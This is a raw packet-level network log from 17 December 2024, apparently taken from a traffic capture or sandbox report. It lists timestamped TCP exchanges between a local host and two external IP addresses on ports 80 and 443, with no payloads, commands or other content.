Dec 17, 2024 06:03:21.058235884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.059125900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.059190035 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.059223890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.059272051 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.060642958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.060657978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.060703039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.060703039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.061382055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.061440945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.061470032 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.061517000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.062589884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.062606096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.062845945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.062845945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.063591003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.063636065 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.063739061 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.063785076 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.064697981 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.064740896 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.064786911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.065085888 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.065814972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.065867901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.065973997 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.066023111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.066900969 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.066968918 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.067038059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.067095041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.068053007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.068293095 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.068326950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.068372965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.069156885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.069259882 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.069294930 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.069340944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.070250034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.070348024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.070383072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.070451975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.071362972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.071413040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.071451902 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.071518898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.072715998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.072743893 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.072776079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.072776079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.073622942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.073673964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.073709965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.073808908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.074712992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.074759960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.074924946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.075004101 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.075865030 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.076030970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.076035023 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.076076984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.077096939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.077112913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.077142954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.077478886 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.078156948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.078172922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.078232050 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.078232050 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.079389095 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.079404116 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.079447985 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.079447985 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.080302954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.080379009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.080396891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.080461979 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.081423044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.081494093 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.081497908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.081538916 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.082531929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.082572937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.082612991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.082812071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.083627939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.083704948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.083853960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.084112883 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.084784031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.084960938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.084995031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.085092068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.086050034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.086064100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.086111069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.086111069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.086950064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.087079048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.087120056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.087227106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.088208914 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.088223934 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.088253021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.088291883 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.089263916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.089354992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.089389086 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.089457989 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.090303898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.090389967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.090421915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.090548992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.091419935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.091487885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.091521025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.091603041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.092711926 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.092727900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.092812061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.092813015 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.093660116 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.093767881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.093806028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.093847036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.094774961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.094854116 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.095029116 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.095278025 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.095946074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.095988989 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.096014977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.096028090 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.097065926 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.097090960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.097111940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.097124100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.098145962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.098258018 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.098290920 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.098357916 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.099240065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.099283934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.099396944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.099473953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.100331068 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.100394964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.100626945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.100759029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.101385117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.101430893 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.193737030 CET	443	49856	178.62.201.34	192.168.2.5
Dec 17, 2024 06:03:21.193859100 CET	443	49856	178.62.201.34	192.168.2.5
Dec 17, 2024 06:03:21.193926096 CET	49856	443	192.168.2.5	178.62.201.34
Dec 17, 2024 06:03:21.193926096 CET	49856	443	192.168.2.5	178.62.201.34
Dec 17, 2024 06:03:21.193974972 CET	443	49856	178.62.201.34	192.168.2.5
Dec 17, 2024 06:03:21.235116005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.235131979 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.235178947 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.235246897 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.235380888 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.235464096 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.235496998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.235639095 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.236440897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.236542940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.236577988 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.236668110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.237756014 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.237771988 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.237854958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.237854958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.238729000 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.238903999 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.238936901 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.238997936 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.239820004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.239865065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.239886999 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.239929914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.241055965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.241071939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.241107941 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.241121054 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.242202044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.242218971 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.242261887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.242352009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.243177891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.243240118 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.243447065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.243602991 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.244313955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.244395018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.244416952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.244546890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.245393991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.245474100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.245618105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.245618105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.246524096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.246596098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.246632099 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.246757984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.247584105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.247670889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.247705936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.247778893 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.248708963 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.248799086 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.248876095 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.248936892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.249819994 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.249916077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.249948978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.250278950 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.250929117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.250971079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.251051903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.251112938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.252060890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.252150059 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.252208948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.252269983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.253334999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.253350973 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.253402948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.253402948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.254297018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.254349947 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.254354000 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.254487991 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.255426884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.255500078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.255525112 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.255568981 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.256494999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.256571054 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.256606102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.256669044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.257666111 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.257738113 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.257746935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.257800102 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.258862972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.258878946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.258956909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.258956909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.259917021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.259979963 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.259989977 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.260034084 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.261065006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.261080027 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.261118889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.261204004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.262309074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.262325048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.262370110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.262422085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.263245106 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.263340950 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.263374090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.263459921 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.264425993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.264441013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.264470100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.264492989 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.265461922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.265508890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.265530109 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.265577078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.266557932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.266638041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.266671896 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.266721964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.267633915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.267721891 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.267756939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.267803907 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.268743038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.268888950 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.268929958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.269005060 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.269956112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.269972086 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.270009041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.270087957 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.271099091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.271115065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.271148920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.271158934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.272093058 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.272150040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.272238970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.272319078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.273264885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.273314953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.273328066 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.273375988 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.274341106 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.274401903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.274409056 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.274523020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.275430918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.275486946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.275500059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.275544882 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.276524067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.276730061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.276762009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.276813030 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.277637959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.277704000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.277712107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.277759075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.278943062 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.278959036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.279086113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.279086113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.279930115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.280013084 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.280046940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.280092001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.281105995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.281196117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.281225920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.281236887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.282289028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.282304049 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.282377958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.282377958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.283293009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.283343077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.283488035 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.283529043 CET	49850	80	192.168.2.5	31.41.244.11
